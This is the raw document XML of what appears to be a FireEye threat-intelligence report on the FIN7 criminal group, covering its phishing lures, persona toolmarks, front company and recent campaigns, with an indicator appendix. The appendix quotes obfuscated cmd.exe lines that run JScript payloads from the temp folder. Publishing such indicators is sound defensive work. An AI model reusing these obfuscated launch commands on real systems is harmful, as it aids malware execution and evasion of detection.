            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Invoke-DOSfuscation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1B42D"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FIN7’s Relentless Phone Calls and Bellyaching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A051A"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 xml:space="preserve">Over the three years of responding to a multitude of compromises and proactively defending against FIN7, FireEye observed unprecedented social engineering prowess. From leveraging web forms for initial contact to targeting and engaging directly with pre-determined store managers, the operators </w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>demonstrated a range of capabilities. FIN7’s reach extended beyond their targets’ computer systems. FireEye has responded to incidents where FIN7 has called victims </w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>prior</w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to lodging digital complaints laden with malicious documents as well as after the phishing documents have been sent, in order to check if they were received – a crude but effective FIN7 email delivery tracking technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC29FB8"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As FIN7 has matured, so did the quality of their phishing lures and templates, which were most often sent from fake but thoroughly disguised individuals and businesses – and occasionally from sender addresses impersonating legitimate government entities. Their phishing has often exploited urgent, high value business matters tailored to their chosen targets. At individual stores, managers were contacted about lost items or sent a “receipt” claiming overcharging. Other FIN7 phishing emails masqueraded as detailed catering orders or requests for special menus tailored to individuals with dietary restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176378E"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In early 2017, a pattern of complaints emerged and has continued for well over a year, where FIN7 has contacted stores and corporate offices to lodge food poisoning complaints with malicious attachments. Internally dubbed “</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FINdigestion</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>” by FireEye, this pattern of detailed complaints eventually expanded beyond individual complaints and into litigious concerns raised on behalf of “the government”, as shown in Figure 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DF0AB" w14:textId="1A70F686"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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.fireeye.com/content/dam/fireeye-www/blog/images/FIN7/Fig1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105630B4" wp14:editId="423F88D4">
            <wp:extent cx="5943600" cy="706628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066280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 1: FDA themed spear phishing email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76469ECB"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It is noteworthy that the BATELEUR backdoor activity </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>first identified by Proofpoint</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in July 2017, which FireEye tracks as a suspected FIN7 subgroup, uses highly-customized graphics for their targets, often created in Adobe Photoshop. In this same phishing campaign, FIN7’s malicious attachment was graphically themed to match, as shown in Figure 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46D2D0" w14:textId="0D75BFAA"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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.fireeye.com/content/dam/fireeye-www/blog/images/FIN7/Fig2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55971B84" wp14:editId="6C622D6E">
            <wp:extent cx="5821680" cy="82296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1680" cy="8229600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2: FDA themed spear phishing attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E123793"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Throughout their operations, the professional design and continued development of phishing elements in parallel to other post-compromise tools indicated to FireEye that FIN7 was most likely a well-resourced criminal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEADD38"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It’s Just Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C356683"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FireEye has tracked several FIN7 personas throughout their operations by collecting and parsing filetypes of forensic value for juicy metadata. In a previous blog, we shared how LNK files created by FIN7 unintentionally revealed valuable information about their development environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AAA022"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LNK files can contain metadata that reveals attributes about the systems on which the LNKs were created, including original file paths, volume serial numbers, MAC addresses, and hostnames. By studying values within the LNK metadata we often identify "toolmarks," or unique values associated with distinct malware developer and operator personas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE0B99"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FIN7 LNK metadata shows that the actors routinely used virtual machines with generic hostnames such as ANDY-PC or USER-PC, and default hostnames with the structure WIN-[A-Z0-9]{11} (e.g. WIN-ABCDEFGH1JK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469FBEDA"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FireEye has tracked several hostname and path toolmarks associated with FIN7’s operations, which we have used to link clusters of threat activity together. These toolmarks may be linked to FIN7 members who are involved in tool development or the broader criminal operation. Notable personas from the technical data, which are explored in more detail in the Technical Appendix section, include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79699BF7" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="10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"andy" / "andy-pc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63914CB6" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="10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"Hass"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5838D73B" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="10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"jimbo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5C89B" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="10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"Константин" (Konstantin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D9170" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1095"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"oleg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79915930"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This analysis allowed us to understand FIN7’s systems and correlate future attack activity to the different personas. Furthermore, the metadata analysis helped us monitor for files generated by the group and use the established toolmarks to establish detection for other adversary methodologies (such as direct RDP or SMB access) if the group changed TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58178F08"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Video Playback of FIN7 Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD704D8"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While responding to multiple FIN7 intrusions, FireEye recovered a custom video recording capability used by FIN7 as a part of their operations. FireEye’s FLARE team reverse engineered the video protocol, which appeared to be custom-written by FIN7 as it has no external library dependencies, contained Cyrillic comments in the code, and required the use of a bespoke video player unique to FIN7. The attackers most likely leveraged this video recording capability in their arsenal to monitor operations in victim environments to inform later stages of their intrusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E18B44"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FireEye obtained a version of the criminal developers’ video player from a trusted source and with the knowledge of the reverse engineered protocol, the FLARE team modified the source code to support multiple versions of FIN7’s custom encoding.</w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>With the patched source code, FireEye can decode and playback FIN7’s video monitoring for affected victims in possession of these files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A87D67"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Recent Shifts in FIN7 Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DFC01E"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lastRenderedPageBreak/>
        <w:t>Throughout 2018, FireEye has continued to identify multiple domains registered using patterns consistent with prior FIN7 activity, as well as campaigns using disparate TTPs that we have attributed to FIN7 with varying degrees of confidence. ZIP archives delivering the BIRDDOG backdoor were hosted on a portion of suspected FIN7 domains registered in 2018. Some evidence further characterizing the nature of this campaign suggests these malicious documents were sent to financial institution customers in Eastern Europe and Central Asia as early as September 2017. The targeting of individuals rather than organizations would mark a significant shift in their targeting, although it is also possible that the banks spoofed in these campaigns were FIN7's ultimate targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA27BA"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Additionally, we have identified similarities between FIN7 activity and BATELEUR campaigns, which began as early as mid-2017 and have been primarily aimed at U.S.-based restaurant chains. These campaigns leveraged macro-embedded Word documents directly attached to the emails as well as ones hosted on Google Drive. The documents were meticulously crafted to appear as though they came from legitimate organizations (e.g. restaurant associations and suppliers of POS hardware). This suspected FIN7 activity continued past the date of most recent arrest announced by U.S. law enforcement, although the attackers are now leveraging an updated JavaScript backdoor dubbed GRIFFON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832C28B"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These recent campaigns could be representative of a decisive effort to diversify TTPs to avoid detection or could indicate the formation of FIN7 splinter groups carrying out autonomous campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in the methods employed by the FIN7 actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5E1C46"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Unveiling FIN7’s Front Company and Industry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F71BC" w14:textId="0F2174D0"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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.fireeye.com/content/dam/fireeye-www/blog/images/FIN7/Fig3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210784A6" wp14:editId="3F75393B">
            <wp:extent cx="5943600" cy="2880360"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 3: Combi Security logo as retrieved from 2016 cache of combisecurity.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B1E00"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 xml:space="preserve">According to U.S. law enforcement, at least a portion of FIN7 activity was run out of a front company dubbed Combi Security. A cache of its website reveals that the company purported to be “the world leaders in the field of comprehensive protection of large information systems from modern cyber threats” with headquarters in Moscow, Haifa, and Odessa. We have identified job advertisements for Combi Security that have been posted on popular Russian, Ukrainian, and Uzbek job recruitment sites, as well as numerous individuals who most likely worked for the company. Due to the seeming legitimacy of the recruitment postings, some individuals may have been unaware of illicit nature of their work. While the recruitment of unwitting individuals as puppets has been a common component </w:t>
      </w:r>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of at least some criminal schemes – for example, reshipping mules who are recruited through postings on career sites advertising attractive work-from-home jobs – FIN7’s veiling of full-scale financial compromises as legitimate offensive security engagements is particularly notable. The apparent success of Combi Security in recruiting unsuspecting individuals in this manner, may lead to more of this type of technical recruitment by cyber criminals in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516AC4A2"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Splitting Up?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08066481"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The criminal organization behind FIN7 is almost certainly comprised of many additional individuals beyond those already apprehended by law enforcement authorities. FireEye iSIGHT Intelligence expects that at least a portion of these malicious actors are likely to continue conducting cyber crime activity in some capacity. Although we expect activity to continue, it is extremely common for threat actors to either modify their TTPs or temporarily halt operations following significant developments such as arrests of high-level members and/or public disclosure of TTPs that they employ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A60AF"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Depending on the organizational and communication structure of the group, it is also plausible that multiple subgroups could form and carry out independent operations in the future. Recent campaigns, as well as those using tactics that were atypical for historical FIN7 campaigns, such as the SEC campaigns with widespread targeting, may be representative of semi-autonomous groups pre-existing within, or cooperating with, the FIN7 criminal organization. As noted in our </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="009403EE">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CARBANAK overview</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, certain malware families and techniques transcend strictly defined threat groups, and may be re-used by developers and operators as they transition between organizations and campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BFFC6"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424045D7"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These recent announcements by U.S. law enforcement highlight the positive impact that can result from synergy between private and public sector organizations in disrupting organized cyber crime operations. As demonstrated by FIN7, financially-motivated threat actors are becoming extremely advanced and are capable of inflicting significant harm on organizations through vast, but carefully orchestrated campaigns. As sophisticated threat groups continue to emerge, partnerships, such as those exhibited here, will almost certainly play a key role in combating these threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C42D10"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Acknowledgements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F017E21"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Jordan Nuce, Tom Bennett, Michael Bailey, and Daniel Bohannon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17507E20"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Technical Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060345B4"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FireEye has responded to many FIN7 incidents, which has provided us extensive insight into their operations. As part of this blog post, we are also including numerous indicators that we attribute to FIN7 and an overview of their techniques to aid organizations in identifying malicious activity across their networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4695C715"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Phishing Documents Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B034F69"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In addition to LNK metadata, FIN7 phishing documents consistently contained artifacts detailing the local file system paths of component files used to construct the spear phishing documents. In the following tables, we have also included examples of the myriad of command line obfuscation techniques used by FIN7. Of particular note is the quick turnaround time between documents employing different techniques.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9240" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1267"/>
        <w:gridCol w:w="1210"/>
        <w:gridCol w:w="1294"/>
        <w:gridCol w:w="35"/>
        <w:gridCol w:w="3878"/>
        <w:gridCol w:w="18"/>
        <w:gridCol w:w="1642"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="67585828"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0A66B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lastRenderedPageBreak/>
              <w:t>EXIF Creation Time</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13E9E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9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001D5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71E90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81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0545E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57A4AEBA"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3AE6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2018:05:21 17:32:00</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9D18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96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C3A8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GRIFFON</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29B0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7e703dddcfc83cd352a910b48eaca95e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="181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6375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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="3D6226D3"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CFFE78"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jimbo</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\Files\Картинки\outlook2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="12BCE969"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782F5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cmd.exe /k "SET a01=wscr&amp; SET a02=ipt&amp;&amp;call %a01%%a02% /e:jscript //b %TEMP%\errors.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="0A0F2127"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531BA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591D4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C5026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FB4DC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E33258"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10D8AA46"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779E1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2018:01:26 15:59:00</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F80EA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55F42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84744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bb1a76702e2e7d0aa23385f24683d214</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6DA82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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6D0D3567"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090B8E"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Hass</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\Картинки\New\outlook3.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="156A4CFF"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C6A3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cmd.exe /c wscript.exe //b /e:jscript %TEMP%\crashpad.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="2B51F8AD"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187E3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B005C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DAD41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089CE0"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7721A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5452EEA9"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BDE0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2018:01:11 13:16:00</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6833D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9A53E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9141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5972597b729a7d2853a3b37444e58e01</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9ACA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check.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="26E49EE6"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9ABA2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Hass</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>\Desktop\Картинки\New\outlook2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
